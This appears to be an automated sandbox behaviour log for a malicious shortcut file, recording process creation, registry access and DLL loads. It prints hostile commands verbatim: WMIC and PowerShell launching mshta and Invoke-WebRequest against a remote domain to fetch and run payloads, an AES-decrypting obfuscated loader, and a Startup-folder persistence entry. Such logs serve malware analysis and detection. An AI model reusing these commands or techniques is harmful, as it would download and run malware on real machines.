Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8384:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxa4dp1.4si.ps1
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: n5Szx8qsFB.lnk | Virustotal: Detection: 29%
Source: n5Szx8qsFB.lnk | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
